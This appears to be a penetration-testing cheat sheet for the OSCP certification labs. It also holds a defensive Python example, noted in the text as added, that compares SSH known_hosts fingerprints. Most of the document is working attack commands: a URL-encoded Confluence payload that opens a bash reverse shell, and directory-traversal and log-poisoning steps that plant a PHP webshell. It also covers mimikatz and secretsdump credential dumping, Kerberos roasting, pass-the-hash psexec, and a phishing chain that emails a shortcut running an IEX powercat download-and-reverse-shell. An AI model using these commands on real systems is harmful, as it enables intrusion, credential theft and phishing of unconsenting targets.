// if after ssh login you hit the error "rbash: cd: restricted", log in again with -t "bash --noprofile"
sudo ssh -i tom_key -oHostKeyAlgorithms=+ssh-dss tom@192.168.227.107 -t "bash --noprofile"
/home/<user>/.ssh/id_rsa
When exploiting directory traversal, read the file above directly (especially when commands like ls cannot be run remotely)
With a user's private key we can log in to the SSH server as that user
kali@kali:~/beyond/websrv1$ chmod 600 id_rsa
kali@kali:~/beyond/websrv1$ ssh -i id_rsa daniela@192.168.50.244
Note: if prompted "Enter passphrase for key 'id_rsa'", the passphrase can be cracked with ssh2john
ssh2john id_rsa > ssh.hash
kali@kali:~/beyond/websrv1$ john --wordlist=/usr/share/wordlists/rockyou.txt ssh.hash
https://github.com/WDavid404/OSCP/issues/16#issuecomment-1891230625
A: you can clear the contents of ~/.ssh/known_hosts
better: ssh-keygen -R example.com
but sometimes that does not work (https://qiita.com/hnw/items/0eeee62ce403b8d6a23c)
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that a host key has just been changed.
The fingerprint for the RSA key sent by the remote host is
**:**:**:**:**:**:**:**:**:**:**:**:**:**:**:**.
Please contact your system administrator.
Add correct host key in /Users/hnw/.ssh/known_hosts to get rid of this message.
Offending RSA key in /Users/hnw/.ssh/known_hosts:133
RSA host key for example.com has changed and you have requested strict checking.
Host key verification failed.
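Before removing the entry, a defender should check which stored key sits at the offending line and whether the key the server now presents really differs from it, since the warning is the only signal of a man-in-the-middle. The following added example (not from the original note) parses known_hosts, including the hashed |1|salt|hmac entries, computes the OpenSSH SHA256 and MD5 fingerprints and compares them with a presented key; the known_hosts content and key blobs are constructed.

```python
import base64
import hashlib
import hmac


def fingerprint_sha256(key_b64: str) -> str:
    """OpenSSH-style fingerprint: SHA256 of the raw key blob, base64 without padding."""
    digest = hashlib.sha256(base64.b64decode(key_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def fingerprint_md5(key_b64: str) -> str:
    """Legacy colon-separated form shown in older HOST IDENTIFICATION HAS CHANGED warnings."""
    digest = hashlib.md5(base64.b64decode(key_b64)).hexdigest()
    return "MD5:" + ":".join(digest[i:i + 2] for i in range(0, 32, 2))


def host_matches(field: str, host: str) -> bool:
    """Match a known_hosts host field (plain, comma list, or |1|salt|hmac) against host."""
    if field.startswith("|1|"):
        _, _, salt_b64, mac_b64 = field.split("|")
        mac = hmac.new(base64.b64decode(salt_b64), host.encode(), "sha1").digest()
        return hmac.compare_digest(mac, base64.b64decode(mac_b64))
    return host in field.split(",")


def find_host_keys(known_hosts: str, host: str) -> list[dict]:
    """Return every entry for host with its 1-based line number and both fingerprints."""
    found = []
    for lineno, line in enumerate(known_hosts.splitlines(), start=1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):  # @cert-authority / @revoked marker precedes the host field
            line = line.split(None, 1)[1]
        parts = line.split()
        if len(parts) < 3:
            continue
        hosts, keytype, key_b64 = parts[0], parts[1], parts[2]
        if host_matches(hosts, host):
            found.append({"line": lineno, "type": keytype,
                          "sha256": fingerprint_sha256(key_b64),
                          "md5": fingerprint_md5(key_b64)})
    return found


def check_presented_key(known_hosts: str, host: str, presented_key_b64: str) -> str:
    """'match' if a stored key equals the presented one, 'changed' if the host is known
    with a different key (the situation the warning reports), else 'unknown'."""
    stored = find_host_keys(known_hosts, host)
    if not stored:
        return "unknown"
    fp = fingerprint_sha256(presented_key_b64)
    return "match" if any(e["sha256"] == fp for e in stored) else "changed"


def hashed_entry(host: str, salt: bytes) -> str:
    """Build the |1|salt|hmac host field OpenSSH writes with HashKnownHosts yes."""
    mac = hmac.new(salt, host.encode(), "sha1").digest()
    return "|1|" + base64.b64encode(salt).decode() + "|" + base64.b64encode(mac).decode()


# Constructed sample keys: arbitrary bytes, not real SSH public keys.
KEY_A = base64.b64encode(b"constructed-host-key-A").decode()
KEY_B = base64.b64encode(b"constructed-host-key-B").decode()
SAMPLE_KNOWN_HOSTS = "\n".join([
    "# constructed known_hosts",
    "example.com,192.0.2.10 ssh-rsa " + KEY_A,
    hashed_entry("[bastion.example]:2222", b"0123456789abcdef0123") + " ssh-ed25519 " + KEY_B,
])

if __name__ == "__main__":
    for entry in find_host_keys(SAMPLE_KNOWN_HOSTS, "example.com"):
        print(entry["line"], entry["type"], entry["sha256"], entry["md5"])
    print(check_presented_key(SAMPLE_KNOWN_HOSTS, "example.com", KEY_B))  # changed
```

Only when the presented fingerprint matches what the server administrator confirms out of band should the stale line be removed with ssh-keygen -R.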
Kali:
$ ssh-keygen
$ ls
`id_rsa id_rsa.pub`
$ cat id_rsa.pub
`ssh-rsa AAAAB3NzaC1 ---SNIP--- rHM= kali@kali`
Target:
`dev@oscp:~$ mkdir /home/dev/.ssh`
`dev@oscp:~$ echo "ssh-rsa AAAAB3NzaC1 ---SNIP--- rHM= kali@kali" > /home/dev/.ssh/authorized_keys`
dev@oscp:~$ cat /home/dev/.ssh/authorized_keys
`ssh-rsa AAAAB3NzaC1 ---SNIP--- rHM= kali@kali`
Back on kali:
`ssh -i id_rsa dev@192.168.XXX.150`
Then,you can setup the forward with ssh as follows
ssh -i id_rsa dev@192.168.xxx.150 -L 8000:127.0.0.1:8000
At this point you should have the access to port 8000, locally on kali at 127.0.0.1:8000
Confirm that it works: nmap -p8000 127.0.0.1
Note: accessing 127.0.0.1:8000 with a web browser or curl will not necessarily return anything, because the service behind the port on the server is not necessarily a web service.
https://github.com/WDavid404/Note_tryhackme/issues/6
https://github.com/WDavid404/OSCP/issues/16
https://gchq.github.io/CyberChef/
curl -v http://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/10.0.0.28/1270%200%3E%261%27%29.start%28%29%22%29%7D/
config file
cat /var/atlassian/application-data/confluence/confluence.cfg.xml
The Hashcat mode number for Atlassian (PBKDF2-HMAC-SHA1) hashes is 12001:
hashcat -m 12001 hashes.txt /usr/share/wordlists/fasttrack.txt
If "Do not require Kerberos preauthentication" is enabled (AS-REP roasting):
impacket-GetNPUsers -dc-ip 192.168.50.70 -request -outputfile hashes.asreproast corp.com/pete
hashcat -m 18200 <hashfile> <Wordlists> -r <rule> --force
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
hashcat -m 13100 <hashfile> <Wordlists> -r <rule> --force
privilege::debug
sekurlsa::logonpasswords
lsadump::dcsync /user:<Domain>\<TargetUsername>
hashcat -m 1000 <hashfile> <Wordlists> -r <rule> --force
Use the zip2john command to generate a hash (in a format John can process) from the zip file and save it to a hash file.
zip2john /path/to/your/protected.zip > ziphash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt ziphash.txt
//for multiple zip files
#!/bin/bash
# Loop through each zip file in the current directory
for file in *.zip; do
sudo zip2john "$file" > "${file%.zip}.hash"
done
john --wordlist=/usr/share/wordlists/rockyou.txt *.hash
psql -h 192.168.50.63 -p 2345 -U postgres
postgres=# \l
--> list databases
postgres=# \c <DB name>
--> connect to the database
e.g. postgres=# \c confluence
confluence=# select * from cwd_user;
http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../etc/passwd
http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../home/offsec/.ssh/id_rsa
curl http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../var/log/apache2/access.log
--> if access.log shows that the User-Agent is included in the log entry, we can modify the User-Agent to include the PHP code snippet <?php echo system($_GET['cmd']); ?>
==> curl "http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../var/log/apache2/access.log&cmd=ps"
and more reverse shell code..
see https://github.com/WDavid404/OSCP/issues/10
curl "http://mountaindesserts.com/meteor/index.php?page=http://192.168.119.3/simple-backdoor.php&cmd=ls"
"&&whoami" 'or order by 5--//
linux-kernel-exploits: https://github.com/SecWiki/linux-kernel-exploits
PowerView.ps1: /usr/share/windows-resources/powersploit/Recon/PowerView.ps1
mimikatz.exe: /usr/share/windows-resources/mimikatz/x64/mimikatz.exe
Bloodhound: sudo apt update && sudo apt install -y bloodhound
Sharphound: https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors
WinPEAS.exe: Installation on Kali: sudo apt install peass
then, cp /usr/share/peass/winpeas/winPEASx64.exe .
linpeas.sh: wget -qc https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.s
WindowsEnum: https://github.com/absolomb/WindowsEnum
AutoRecon: https://github.com/Tib3rius/AutoRecon --> but AutoRecon sometimes misses ports, so also scan manually with nmap.
e.g.
python3 autorecon.py 192.168.1.100 192.168.1.1/30 localhost
python3 autorecon.py -ct 2 -cs 2 -vv -o outputdir 192.168.1.100 192.168.1.1/30 localhost -vv
# When you want to use sudo
sudo env "PATH=$PATH" autorecon 192.168.1.100
powershell -ep bypass
mimikatz #privilege::debug
mimikatz #sekurlsa::logonpasswords
mimikatz #token::elevate ## to elevate to SYSTEM user privileges.
mimikatz #lsadump::sam
#### online command
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
.\mimikatz.exe "token::elevate" "lsadump::sam" "exit"
### dcsync
mimikatz # lsadump::dcsync /user:corp\Administrator
mimikatz # lsadump::dcsync /user:corp\<username>
https://www.netexec.wiki/
netexec
crackmapexec smb 172.16.206.10-14 172.16.206.82-83 -u joe -d MEDTECH.COM -p "Flowers1" --shares
proxychains -q crackmapexec smb 172.16.206.10-14 172.16.206.82-83 -u joe -d MEDTECH.COM -p "Flowers1" --shares
crackmapexec smb <IP address/subnet> -u
impacket-psexec -hashes 000000000000000000000000000000000:8d7a47a6f9f66b97b1bae4178747494 joe@172.16.206.11
proxychains -q impacket-psexec -hashes 000000000000000000000000000000000:8d7a47a6f9f66b97b1bae4178747494 joe@172.16.206.11
impacket-psexec relia/administrator:"vau!XCKjNQBv2$"@192.168.246.189
proxychains impacket-GetNPUsers -dc-ip 172.16.193.10 -request -outputfile hashes.asreproast medtech.com/joe:password
locate GetNPUsers.py
impacket-secretsdump example.local/username:password@<target-ip>
# -just-dc: Extract only NTDS.DIT (NTLM hashes and kerberos keys).
impacket-secretsdump -just-dc example.local/username:password@<target-ip>
# -just-dc-ntlm: Extract only NTDS.DIT data (NTLM hashes only).
impacket-secretsdump -just-dc-ntlm example.local/username:password@<target-ip>
impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL
// ntds.dit.bak and system.bak are downloaded from the target machine.
impacket-secretsdump -sam SAM -system SYSTEM LOCAL
[Kali] Download chisel into the current directory (https://github.com/jpillora/chisel/releases/tag/v1.9.1, get the windows amd64 build and the linux build)
chmod a+x chisel
./chisel server -p 8000 --reverse
[Victim]
iwr -uri http://192.168.45.152/chisel.exe -Outfile chisel.exe
.\chisel client 192.168.45.152:8000 R:1080:socks
add ip and domain name to /etc/hosts: sudo vi /etc/hosts
kali@kali:~$ mkdir /home/kali/pen-200/webdav
kali@kali:~$ wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/pen-200/webdav/
Hard-learned lesson: the WebDAV port must be 80, otherwise the later steps will not succeed!
2. Log in to a Windows PC to create the Windows Library file (config.Library-ms) and the shortcut file
Connect WINPREP via RDP as offsec with a password of lab in order to prepare the Windows Library and shortcut files.
<?xml version="1.0" encoding="UTF-8"?>
Note: the contents of config.Library-ms change after it is saved to Kali; remember to restore them manually.
Create a new shortcut on the Windows PC desktop (the name, e.g. configuration, does not matter)
Set the shortcut target to the following, then copy the shortcut into the WebDAV directory on Kali (double-clicking the config file then points to the WebDAV directory)
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.204:9000/powercat.ps1'); powercat -c 192.168.45.204 -p 4444 -e powershell"
--> this downloads a powercat.ps1 file from Kali's port 9000 (the port of http.server) and runs it to send a reverse shell to Kali's port 4444
Prepare on Kali:
- place the powercat.ps1 file in the webdav directory (/usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1)
_Hard-learned note: the powercat.ps1 downloaded from the internet does not work well; search for it on Kali instead: find / -name powercat.ps1 2>/dev/null_
- in the webdav directory: python3 -m http.server 9000
- nc -lvp 4444
- a body.txt file, contents arbitrary.
then,
kali@kali:~/beyond$ sudo swaks -t daniela@beyond.com -t marcus@beyond.com --from john@beyond.com --attach @config.Library-ms --server 192.168.50.242 --body @body.txt --header "Subject: Staging Script" --suppress-data -ap
Username: john
Password: dqsTwTpZPn#nL
=== Trying 192.168.50.242:25...
=== Connected to 192.168.50.242.
<-  220 MAILSRV1 ESMTP
 -> EHLO kali
<-  250-MAILSRV1
<-  250-SIZE 20480000
<-  250-AUTH LOGIN
<-  250 HELP
 -> AUTH LOGIN
<-  334 VXNlcm5hbWU6
 -> am9obg==
<-  334 UGFzc3dvcmQ6
 -> ZHFzVHdUcFpQbiNuTA==
<-  235 authenticated.
 -> MAIL FROM:john@beyond.com
<-  250 OK
 -> RCPT TO:marcus@beyond.com
<-  250 OK
 -> DATA
<-  354 OK, send.
 -> 36 lines sent
<-  250 Queued (1.088 seconds)
 -> QUIT
<-  221 goodbye
=== Connection closed with remote host.
nc then receives a reverse shell from an internal PC (CLIENTWK1) (IP: 172.16.74.243)
chromium --enable-chrome-browser-cloud-management
--
./GodPotato-NET4.exe -cmd "C:\Users\adrian\nc64.exe -e c:\windows\system32\cmd.exe 192.168.45.243 4445"
https://dev.mysql.com/doc/refman/8.0/en/connecting.html
mysql --host=localhost --user=myname --password=password mydb
mysql -h localhost -u myname -ppassword mydb
mysql --host=localhost --user=myname --password mydb
mysql -h localhost -u myname -p mydb
https://github.com/DominicBreuker/pspy
target$ timeout 5m ./pspy64
This will run the pspy executable and then terminate it automatically after 5 minutes. Can do with seconds too, e.g. 180s.
unzip xxxx.zip
unzip -P your-password zipfile.zip
7z x test.7z -ppassword
tar -zxvf xxxx.tar.gz
tar -zcvf xxxx.tar.gz directory
zip -r xxxx.zip directory
https://book.hacktricks.xyz/network-services-pentesting/pentesting-snmp
snmpwalk -v 2c -c public 192.168.190.149 NET-SNMP-EXTEND-MIB::nsExtendOutputFull
snmpbulkwalk -c public -v2c 192.168.182.149 .
--> contains more information than autorecon finds, e.g. passwords
sc.exe start "service name"
sc.exe stop "service name"
PS> Start-Service -Name "ServiceName"
PS> Restart-Service -Name "ServiceName"
get-service "ServiceName" | stop-service -WhatIf
exiftool -a -u PDF_NAME.pdf
cd c:\Users then tree /F
ls -Force
dir -force
https://github.com/peass-ng/PEASS-ng/blob/master/winPEAS/winPEASexe/README.md The output will be colored using ANSI colors. If you are executing winpeas.exe from a Windows console, you need to set a registry value to see the colors (and open a new CMD):
REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1
Below you have some indications about what each color means exactly, but keep in mind that Red is for something interesting (from a pentester perspective) and Green is something well configured (from a defender perspective).
openssl passwd xxxx
or
openssl passwd -1 -salt xxxxxxxx password
-->
$1$xxxxxxxx$UYCIxa628.9qXjpQCjM4a.
### options:
Cryptographic options:
-salt val Use provided salt
-6 SHA512-based password algorithm
-5 SHA256-based password algorithm
-apr1 MD5-based password algorithm, Apache variant
-1 MD5-based password algorithm
-aixmd5 AIX MD5-based password algorithm
https://gabb4r.gitbook.io/oscp-notes/cheatsheet/command-injection-cheatsheet
https://www.kali.org/tools/cewl/
cewl -d 2 -m 5 -w docswords.txt https://example.com
cat secret.txt | base64 -d
install metasploit framework in kali
sudo apt-get update
sudo apt-get install metasploit-framework
OSCP-CheatSheet
https://notchxor.github.io/oscp-notes/2-web/LFI-RFI/ https://github.com/WDavid404/OSCP-CheatSheet https://github.com/saisathvik1/OSCP-Cheatsheet
Windows privilege escalation guide
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ https://github.com/xMilkPowderx/OSCP/blob/master/Windows%20Priv%20Esc.md
linux privilege escalation list
https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-shutdown-poweroff-privilege-escalation/
Notes: proving-grounds-all-33-warm-up-machines
https://medium.com/@abhirupkonwar04/proving-grounds-all-33-warm-up-machines-pwned-618cdb3d9607
Other
Hacktricks: https://book.hacktricks.xyz
https://gtfobins.github.io/ : a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.
CVE exploit code list: https://github.com/Al1ex
https://github.com/danielmiessler/SecLists
MSFVenom Cheat Sheet: https://web.archive.org/web/20220607215637/https://thedarksource.com/msfvenom-cheat-sheet-create-metasploit-payloads/
PayloadsAllTheThings (e.g MS SQL injection ): https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md
On kali
tree /usr/share/webshells/
useful resource